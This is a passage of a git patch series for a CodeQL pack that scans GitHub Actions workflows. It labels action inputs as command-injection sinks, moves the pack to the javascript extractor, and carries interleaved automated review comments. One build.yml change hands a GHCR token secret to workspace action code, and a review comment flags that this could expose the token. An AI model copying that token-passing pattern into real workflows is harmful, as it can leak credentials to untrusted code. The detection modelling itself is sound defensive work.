githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"] - ["wearerequired/lint-action", "*", "input.git_email", "command-injection", "manual"] diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml index 5864c0d0ede..1e915194d96 100644 
--- a/ql/lib/ext/webfactory_ssh-agent.model.yml +++ b/ql/lib/ext/webfactory_ssh-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"] - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection", "manual"] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 173ecfc4222..1cc360c472d 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml index 880b0d606da..cb7e0936cca 100644 --- a/ql/lib/ext/zaproxy_action-baseline.model.yml +++ b/ql/lib/ext/zaproxy_action-baseline.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] - ["zaproxy/action-baseline", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml index fd8172c6ca8..210c3365eda 100644 --- a/ql/lib/ext/zaproxy_action-full-scan.model.yml +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml 
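Review bot: In `ql/lib/ext/xt0rted_slash-command-action.model.yml` the two data rows are identical (`output.command-arguments` appears twice), so the second row adds nothing and one of the action's outputs is probably left unmodelled. If the intent was to cover the command name as well, the second row would read `- ["xt0rted/slash-command-action", "*", "output.command-name", "text", "manual"]`; check that output name against the action's `action.yml` before using it. A missing source row means text taken from that output would not be tracked as untrusted by the queries that consume `actionsSourceModel`.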
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] - ["zaproxy/action-full-scan", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5cfa47a5cdf..89f8511812b 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,14 +4,13 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.36 dependencies: + codeql/javascript-all: ^1.0.0 codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 codeql/controlflow: ^1.0.0 codeql/dataflow: ^1.0.0 -dbscheme: yaml.dbscheme -extractor: yaml -groups: - - yaml +extractor: javascript +groups: javascript dataExtensions: - ext/*.model.yml - ext/**/*.model.yml diff --git a/ql/lib/yaml.dbscheme b/ql/lib/yaml.dbscheme deleted file mode 100644 index 20d83c71ee6..00000000000 --- a/ql/lib/yaml.dbscheme +++ /dev/null 
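Review bot: In `ql/lib/qlpack.yml`, `groups: javascript` is a bare scalar, where the removed value was a list and `ql/test/qlpack.yml` in this same commit uses `groups: [javascript, test]`. Writing it as `groups: [javascript]` keeps the manifests consistent. The hunk also removes `dbscheme: yaml.dbscheme` without naming a replacement, so the library pack presumably now takes its schema from the added `codeql/javascript-all` dependency. A comment next to `extractor: javascript` should say so, for example `# workflow YAML is extracted by the javascript extractor; dbscheme comes from codeql/javascript-all`, because the pack still models YAML workflows and the switch is not self-explanatory.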
@@ -1,80 +0,0 @@ -/*- YAML -*/ - -#keyset[parent, idx] -yaml (unique int id: @yaml_node, - int kind: int ref, - int parent: @yaml_node_parent ref, - int idx: int ref, - string tag: string ref, - string tostring: string ref); - -case @yaml_node.kind of - 0 = @yaml_scalar_node -| 1 = @yaml_mapping_node -| 2 = @yaml_sequence_node -| 3 = @yaml_alias_node -; - -@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; - -@yaml_node_parent = @yaml_collection_node | @file; - -yaml_anchors (unique int node: @yaml_node ref, - string anchor: string ref); - -yaml_aliases (unique int alias: @yaml_alias_node ref, - string target: string ref); - -yaml_scalars (unique int scalar: @yaml_scalar_node ref, - int style: int ref, - string value: string ref); - -yaml_errors (unique int id: @yaml_error, - string message: string ref); - -yaml_locations(unique int locatable: @yaml_locatable ref, - int location: @location_default ref); - -@yaml_locatable = @yaml_node | @yaml_error; - -/*- Files and folders -*/ - -/** - * The location of an element. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `file`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ -locations_default( - unique int id: @location_default, - int file: @file ref, - int beginLine: int ref, - int beginColumn: int ref, - int endLine: int ref, - int endColumn: int ref -); - -files( - unique int id: @file, - string name: string ref -); - -folders( - unique int id: @folder, - string name: string ref -); - -@container = @file | @folder - -containerparent( - int parent: @container ref, - unique int child: @container ref -); - -/*- Source location prefix -*/ - -/** - * The source location of the snapshot. - */ -sourceLocationPrefix(string prefix : string ref); 
diff --git a/ql/lib/yaml.dbscheme.stats b/ql/lib/yaml.dbscheme.stats deleted file mode 100644 index 1c35ae98402..00000000000 --- a/ql/lib/yaml.dbscheme.stats +++ /dev/null @@ -1,4 +0,0 @@ - - - - \ No newline at end of file diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 4b8239b7f6c..8110845ea1f 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -7,6 +7,12 @@ dependencies: version: 1.0.0 codeql/ssa: version: 1.0.0 + codeql/javascript-all: + version: 1.0.0 + codeql/regex: + version: 1.0.0 + codeql/tutorial: + version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 65bb672183f..669a8f88186 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -6,8 +6,9 @@ groups: - actions - queries suites: codeql-suites -extractor: yaml +extractor: javascript defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: + codeql/javascript-all: ^1.0.0 githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 4b8239b7f6c..8110845ea1f 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -7,6 +7,12 @@ dependencies: version: 1.0.0 codeql/ssa: version: 1.0.0 + codeql/javascript-all: + version: 1.0.0 + codeql/regex: + version: 1.0.0 + codeql/tutorial: + version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index e3304b4fe72..80ebd80b4c2 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql 
@@ -50,13 +50,13 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = query predicate scopes(Cfg::CfgScope c) { any() } query predicate sources(string action, string version, string output, string kind, string provenance) { - sourceModel(action, version, output, kind, provenance) + actionsSourceModel(action, version, output, kind, provenance) } query predicate summaries( string action, string version, string input, string output, string kind, string provenance ) { - summaryModel(action, version, input, output, kind, provenance) + actionsSummaryModel(action, version, input, output, kind, provenance) } query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml index d85fc698394..1676d742d37 100644 --- a/ql/test/qlpack.yml +++ b/ql/test/qlpack.yml @@ -1,12 +1,10 @@ --- name: githubsecuritylab/actions-tests -groups: - - actions - - test +groups: [javascript, test] dependencies: githubsecuritylab/actions-all: ${workspace} githubsecuritylab/actions-queries: ${workspace} -extractor: yaml +extractor: javascript tests: . warnOnImplicitThis: true From df3d6131a8f754cec6514f5d715b75a33158efbd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 08:50:49 +0200 Subject: [PATCH 0328/1267] Update lock files --- ql/lib/codeql-pack.lock.yml | 2 ++ ql/src/codeql-pack.lock.yml | 8 ++++++-- ql/src/qlpack.yml | 4 +--- ql/test/codeql-pack.lock.yml | 8 ++++++-- 4 files changed, 15 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index c50889c1885..82795df0006 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -1,6 +1,8 @@ --- lockVersion: 1.0.0 dependencies: + codeql/controlflow: + version: 1.0.0 codeql/dataflow: version: 1.0.0 codeql/javascript-all: diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 8110845ea1f..82795df0006 100644 
--- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -5,18 +5,22 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/ssa: - version: 1.0.0 codeql/javascript-all: version: 1.0.0 + codeql/mad: + version: 1.0.0 codeql/regex: version: 1.0.0 + codeql/ssa: + version: 1.0.0 codeql/tutorial: version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 + codeql/xml: + version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 669a8f88186..17e451718c5 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -2,9 +2,7 @@ library: false name: githubsecuritylab/actions-queries version: 0.0.36 -groups: - - actions - - queries +groups: [actions, queries] suites: codeql-suites extractor: javascript defaultSuiteFile: codeql-suites/actions-code-scanning.qls diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 8110845ea1f..82795df0006 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -5,18 +5,22 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/ssa: - version: 1.0.0 codeql/javascript-all: version: 1.0.0 + codeql/mad: + version: 1.0.0 codeql/regex: version: 1.0.0 + codeql/ssa: + version: 1.0.0 codeql/tutorial: version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 + codeql/xml: + version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false From e2fb677abb6df7e47cb3f0e2d7f56ea5fabd950f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 09:48:27 +0200 Subject: [PATCH 0329/1267] Remove DS_Store --- .!79690!.DS_Store | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 .!79690!.DS_Store diff --git a/.!79690!.DS_Store b/.!79690!.DS_Store deleted file mode 100644 index e69de29bb2d..00000000000 From e5eb85695dadf607ec0f31deeb7a93bc556912ae Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 10:04:50 +0200 Subject: [PATCH 0330/1267] Update action to use javascript extractor --- .github/action/dist/index.js | 10 +++++----- .github/action/src/codeql.ts | 2 +- .github/action/src/index.ts | 8 ++++---- 3 files changed, 10 insertions(+), 10 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 8ff1e7759d2..7bb3039fe48 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28604,7 +28604,7 @@ const toolcache = __importStar(__nccwpck_require__(7784)); const toolrunner = __importStar(__nccwpck_require__(8159)); async function newCodeQL() { return { - language: "yaml", + language: "javascript", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, @@ -28771,16 +28771,16 @@ async function run() { var codeql = await cql.newCodeQL(); core.debug(`CodeQL CLI found at '${codeql.path}'`); await cql.runCommand(codeql, ["version", "--format", "terse"]); - // check yaml support + // check javascript support var languages = await cql.runCommandJson(codeql, [ "resolve", "languages", "--format", "json", ]); - if (!languages.hasOwnProperty("yaml")) { - core.setFailed("CodeQL Yaml extractor not installed"); - throw new Error("CodeQL Yaml extractor not installed"); + if (!languages.hasOwnProperty("javascript")) { + core.setFailed("CodeQL javascript extractor not installed"); + throw new Error("CodeQL javascript extractor not installed"); } // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 76eacd6eb67..08c4b420a4c 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts 
@@ -24,7 +24,7 @@ export interface CodeQLConfig { export async function newCodeQL(): Promise { return { - language: "yaml", + language: "javascript", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index b1a4fc80c64..53a484ae6c1 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -15,7 +15,7 @@ export async function run(): Promise { await cql.runCommand(codeql, ["version", "--format", "terse"]); - // check yaml support + // check javascript support var languages = await cql.runCommandJson(codeql, [ "resolve", "languages", @@ -23,9 +23,9 @@ export async function run(): Promise { "json", ]); - if (!languages.hasOwnProperty("yaml")) { - core.setFailed("CodeQL Yaml extractor not installed"); - throw new Error("CodeQL Yaml extractor not installed"); + if (!languages.hasOwnProperty("javascript")) { + core.setFailed("CodeQL javascript extractor not installed"); + throw new Error("CodeQL javascript extractor not installed"); } // download pack From f068504c4f50710ae88d4bfed562b728538ac2f4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 10:07:36 +0200 Subject: [PATCH 0331/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 89f8511812b..51347aa2c3b 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.36 +version: 0.1.0 dependencies: codeql/javascript-all: ^1.0.0 codeql/util: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 17e451718c5..e8c5259e9b8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
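Review bot: In `.github/action/src/index.ts`, `languages.hasOwnProperty("javascript")` calls a prototype method directly on an object that presumably comes from parsing the CLI's JSON output. `Object.prototype.hasOwnProperty.call(languages, "javascript")` does not depend on the object's own keys and satisfies the common `no-prototype-builtins` lint rule. The comment `// check javascript support` could also say why a pack that analyses workflow YAML needs the JavaScript extractor, for example `// workflow YAML is extracted by the javascript extractor`. The same lines appear in `.github/action/dist/index.js`, which looks like build output and should be regenerated rather than edited by hand. `run()` begins and ends outside this hunk.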
@@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.36 +version: 0.1.0 groups: [actions, queries] suites: codeql-suites extractor: javascript From f8dd493a684f58f816d883276132547409ae068c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 11:15:17 +0200 Subject: [PATCH 0332/1267] Update build.yml --- .github/workflows/build.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 78fec3b00eb..8ba664564b4 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -25,4 +25,6 @@ jobs: - name: Run action if: steps.changes.outputs.src == 'true' + env: + GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} uses: ./ From c61e71f22d3faeb4ad118688a553bbf4104b2264 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 11:19:06 +0200 Subject: [PATCH 0333/1267] Update build.yml --- .github/workflows/build.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 8ba664564b4..9bc5b787fea 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -25,6 +25,6 @@ jobs: - name: Run action if: steps.changes.outputs.src == 'true' - env: - GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} uses: ./ + with: + token: ${{ secrets.GHCR_TOKEN }} From fbaf329428eb998999d8aaa6935852490df15982 Mon Sep 17 00:00:00 2001 
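Review bot: In `.github/workflows/build.yml`, the `Run action` step now passes `secrets.GHCR_TOKEN` to `uses: ./`, that is, to whatever action code sits in the checked-out workspace, and nothing in the hunk shows which ref that is. The workflow's `on:` triggers and the checkout step are outside the hunk, so confirm that this job cannot run on a privileged trigger with a pull request's head checked out; in that case the token would be readable by contributor-controlled code. I would add a comment above the step, such as `# GHCR_TOKEN: package read scope only; this job must run on trusted refs only`, and keep the token's scope to what the pack download needs. The preceding hunk in the series (`env: GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }}`) has the same exposure and is superseded by this one.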
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:50:28 +0200 Subject: [PATCH 0334/1267] Remove dependencies with javascript-all --- ql/lib/codeql-pack.lock.yml | 10 - ql/lib/qlpack.yml | 1 - ql/src/codeql-pack.lock.yml | 10 - ql/src/qlpack.yml | 2 +- ql/src/semmlecode.javascript.dbscheme | 1190 + ql/src/semmlecode.javascript.dbscheme.stats | 28248 ++++++++++++++++++ ql/test/codeql-pack.lock.yml | 10 - 7 files changed, 29439 insertions(+), 32 deletions(-) create mode 100644 ql/src/semmlecode.javascript.dbscheme create mode 100644 ql/src/semmlecode.javascript.dbscheme.stats diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 82795df0006..4b8239b7f6c 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -5,22 +5,12 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/javascript-all: - version: 1.0.0 - codeql/mad: - version: 1.0.0 - codeql/regex: - version: 1.0.0 codeql/ssa: version: 1.0.0 - codeql/tutorial: - version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 - codeql/xml: - version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 51347aa2c3b..6a247cee330 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,7 +4,6 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.1.0 dependencies: - codeql/javascript-all: ^1.0.0 codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 codeql/controlflow: ^1.0.0 diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 82795df0006..4b8239b7f6c 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml 
@@ -5,22 +5,12 @@ dependencies:
 version: 1.0.0
 codeql/dataflow:
 version: 1.0.0
- codeql/javascript-all:
- version: 1.0.0
- codeql/mad:
- version: 1.0.0
- codeql/regex:
- version: 1.0.0
 codeql/ssa:
 version: 1.0.0
- codeql/tutorial:
- version: 1.0.0
 codeql/typetracking:
 version: 1.0.0
 codeql/util:
 version: 1.0.0
- codeql/xml:
- version: 1.0.0
 codeql/yaml:
 version: 1.0.0
 compiled: false
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index e8c5259e9b8..05f3408c578 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -5,8 +5,8 @@ version: 0.1.0
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
+dbscheme: semmlecode.javascript.dbscheme
 defaultSuiteFile: codeql-suites/actions-code-scanning.qls
 dependencies:
- codeql/javascript-all: ^1.0.0
 githubsecuritylab/actions-all: ${workspace}
 warnOnImplicitThis: true
diff --git a/ql/src/semmlecode.javascript.dbscheme b/ql/src/semmlecode.javascript.dbscheme
new file mode 100644
index 00000000000..c88c69174bd
--- /dev/null
+++ b/ql/src/semmlecode.javascript.dbscheme
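Review bot: The added `dbscheme: semmlecode.javascript.dbscheme` line in `ql/src/qlpack.yml` points the query pack at a copy of the JavaScript schema committed into `ql/src`, while `extractor: javascript` still builds databases with whatever schema the installed extractor ships. With the `codeql/javascript-all` dependency removed in the same hunk, nothing in the pack ties the copied file to an upstream release, so the two can probably drift apart without anyone noticing until a database fails to load. I would record the origin next to the setting, e.g. `# copied from codeql/javascript-all <UPSTREAM_VERSION_PLACEHOLDER>; keep in sync with the javascript extractor`. The commit message should also say how the file and its `.stats` companion are meant to be refreshed.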
@@ -0,0 +1,1190 @@ +/*** Standard fragments ***/ + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. 
+ */ +sourceLocationPrefix(string prefix : string ref); + +/*- JavaScript-specific part -*/ + +@location = @location_default + +@sourceline = @locatable; + +filetype( + int file: @file ref, + string filetype: string ref +) + +// top-level code fragments +toplevels (unique int id: @toplevel, + int kind: int ref); + +is_externs (int toplevel: @toplevel ref); + +case @toplevel.kind of + 0 = @script +| 1 = @inline_script +| 2 = @event_handler +| 3 = @javascript_url +| 4 = @template_toplevel; + +is_module (int tl: @toplevel ref); +is_nodejs (int tl: @toplevel ref); +is_es2015_module (int tl: @toplevel ref); +is_closure_module (int tl: @toplevel ref); + +@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; +toplevel_parent_xml_node( + unique int toplevel: @toplevel ref, + int xmlnode: @xml_node_with_code ref); + +xml_element_parent_expression( + unique int xmlnode: @xmlelement ref, + int expression: @expr ref, + int index: int ref); + +// statements +#keyset[parent, idx] +stmts (unique int id: @stmt, + int kind: int ref, + int parent: @stmt_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +stmt_containers (unique int stmt: @stmt ref, + int container: @stmt_container ref); + +jump_targets (unique int jump: @stmt ref, + int target: @stmt ref); + +@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; +@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; + +case @stmt.kind of + 0 = @empty_stmt +| 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @labeled_stmt +| 5 = @break_stmt +| 6 = @continue_stmt +| 7 = @with_stmt +| 8 = @switch_stmt +| 9 = @return_stmt +| 10 = @throw_stmt +| 11 = @try_stmt +| 12 = @while_stmt +| 13 = @do_while_stmt +| 14 = @for_stmt +| 15 = @for_in_stmt +| 16 = @debugger_stmt +| 17 = @function_decl_stmt +| 18 = @var_decl_stmt +| 19 = @case +| 20 = @catch_clause +| 21 = 
@for_of_stmt +| 22 = @const_decl_stmt +| 23 = @let_stmt +| 24 = @legacy_let_stmt +| 25 = @for_each_stmt +| 26 = @class_decl_stmt +| 27 = @import_declaration +| 28 = @export_all_declaration +| 29 = @export_default_declaration +| 30 = @export_named_declaration +| 31 = @namespace_declaration +| 32 = @import_equals_declaration +| 33 = @export_assign_declaration +| 34 = @interface_declaration +| 35 = @type_alias_declaration +| 36 = @enum_declaration +| 37 = @external_module_declaration +| 38 = @export_as_namespace_declaration +| 39 = @global_augmentation_declaration +| 40 = @using_decl_stmt +; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; + +@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; + +@namespace_definition = @namespace_declaration | @enum_declaration; +@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; + +is_instantiated(unique int decl: @namespace_declaration ref); + +@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; +has_declare_keyword(unique int stmt: @declarable_node ref); + +is_for_await_of(unique int forof: @for_of_stmt ref); + +// expressions +#keyset[parent, idx] +exprs (unique int id: @expr, + int kind: int ref, + int parent: @expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @expr_or_type ref); + +enclosing_stmt (unique int expr: @expr_or_type ref, + int stmt: @stmt ref); + +expr_containers (unique int expr: @expr_or_type ref, + int container: @stmt_container ref); + +array_size (unique int ae: @arraylike ref, + int sz: int ref); + +is_delegating (int yield: @yield_expr ref); + +@expr_or_stmt = @expr | @stmt; 
+@expr_or_type = @expr | @typeexpr; +@expr_parent = @expr_or_stmt | @property | @function_typeexpr; +@arraylike = @array_expr | @array_pattern; +@type_annotation = @typeexpr | @jsdoc_type_expr; +@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; + +case @expr.kind of + 0 = @label +| 1 = @null_literal +| 2 = @boolean_literal +| 3 = @number_literal +| 4 = @string_literal +| 5 = @regexp_literal +| 6 = @this_expr +| 7 = @array_expr +| 8 = @obj_expr +| 9 = @function_expr +| 10 = @seq_expr +| 11 = @conditional_expr +| 12 = @new_expr +| 13 = @call_expr +| 14 = @dot_expr +| 15 = @index_expr +| 16 = @neg_expr +| 17 = @plus_expr +| 18 = @log_not_expr +| 19 = @bit_not_expr +| 20 = @typeof_expr +| 21 = @void_expr +| 22 = @delete_expr +| 23 = @eq_expr +| 24 = @neq_expr +| 25 = @eqq_expr +| 26 = @neqq_expr +| 27 = @lt_expr +| 28 = @le_expr +| 29 = @gt_expr +| 30 = @ge_expr +| 31 = @lshift_expr +| 32 = @rshift_expr +| 33 = @urshift_expr +| 34 = @add_expr +| 35 = @sub_expr +| 36 = @mul_expr +| 37 = @div_expr +| 38 = @mod_expr +| 39 = @bitor_expr +| 40 = @xor_expr +| 41 = @bitand_expr +| 42 = @in_expr +| 43 = @instanceof_expr +| 44 = @logand_expr +| 45 = @logor_expr +| 47 = @assign_expr +| 48 = @assign_add_expr +| 49 = @assign_sub_expr +| 50 = @assign_mul_expr +| 51 = @assign_div_expr +| 52 = @assign_mod_expr +| 53 = @assign_lshift_expr +| 54 = @assign_rshift_expr +| 55 = @assign_urshift_expr +| 56 = @assign_or_expr +| 57 = @assign_xor_expr +| 58 = @assign_and_expr +| 59 = @preinc_expr +| 60 = @postinc_expr +| 61 = @predec_expr +| 62 = @postdec_expr +| 63 = @par_expr +| 64 = @var_declarator +| 65 = @arrow_function_expr +| 66 = @spread_element +| 67 = @array_pattern +| 68 = @object_pattern +| 69 = @yield_expr +| 70 = @tagged_template_expr +| 71 = @template_literal +| 72 = @template_element +| 73 = @array_comprehension_expr +| 74 = @generator_expr +| 75 = @for_in_comprehension_block +| 76 = @for_of_comprehension_block +| 77 = @legacy_letexpr +| 78 = @var_decl +| 79 = 
@proper_varaccess +| 80 = @class_expr +| 81 = @super_expr +| 82 = @newtarget_expr +| 83 = @named_import_specifier +| 84 = @import_default_specifier +| 85 = @import_namespace_specifier +| 86 = @named_export_specifier +| 87 = @exp_expr +| 88 = @assign_exp_expr +| 89 = @jsx_element +| 90 = @jsx_qualified_name +| 91 = @jsx_empty_expr +| 92 = @await_expr +| 93 = @function_sent_expr +| 94 = @decorator +| 95 = @export_default_specifier +| 96 = @export_namespace_specifier +| 97 = @bind_expr +| 98 = @external_module_reference +| 99 = @dynamic_import +| 100 = @expression_with_type_arguments +| 101 = @prefix_type_assertion +| 102 = @as_type_assertion +| 103 = @export_varaccess +| 104 = @decorator_list +| 105 = @non_null_assertion +| 106 = @bigint_literal +| 107 = @nullishcoalescing_expr +| 108 = @e4x_xml_anyname +| 109 = @e4x_xml_static_attribute_selector +| 110 = @e4x_xml_dynamic_attribute_selector +| 111 = @e4x_xml_filter_expression +| 112 = @e4x_xml_static_qualident +| 113 = @e4x_xml_dynamic_qualident +| 114 = @e4x_xml_dotdotexpr +| 115 